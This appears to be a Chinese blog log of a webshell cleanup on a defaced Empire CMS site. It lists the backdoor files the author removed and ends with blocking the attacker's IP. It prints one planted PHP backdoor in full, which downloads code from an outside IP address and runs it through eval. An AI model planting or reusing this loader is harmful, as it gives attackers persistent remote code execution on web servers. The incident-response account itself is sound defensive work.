缘起:
2018.11.30 9点26分
网友加好友求查杀。状态:新网站,首页定时被篡改,豆腐炒菠菜。
环境: 帝国cms7.5 utf8 nginx linux
所给权限:后台账号和密码,ftp账户和密码
查收过程:
9点 28分
登录后台,查看自定义页面,没有发现木马。但是修改自定义页面,有报错:.
9点31分 上传查杀工具
9点 38分 上传完成
https://。。。、/d/file/p/tuku/safe.func.php 删除
https://.../testdata/demopic/photo/dt/video.asf.php 删除
https://.../d/txt/jqplot.css.php 删除
这里有两个
10点37分 查杀 结束
合计 查杀 5个木马
由于现场被破坏,所以可能还有漏网之鱼。继续关注,等其暴露
23点 50分
https://。。。/e/DoPrint/noimage.php
删除了
https://。。。/e/enews/group_buy.php
https://。。。m/e/enews/aa.php
这个厉害,从网络下载代码然后执行。 代码如下
<?php
function s(){
$contents = file_get_contents('http://23.252.161.21:8686/8group/a.jpg');
a($contents);
}
function a($conn){
$b = '';
eval($b.$conn.$b);
}
s();
//
?>
0点 15 分 完毕
这次删除 三个
这次查杀后,网站首页仍然被修改,后发现有漏查木马,反复了两次。未能发现漏洞。
最后,在宝塔面板,屏蔽了ip地址:
23.252.161.21
才算消停。持续关注。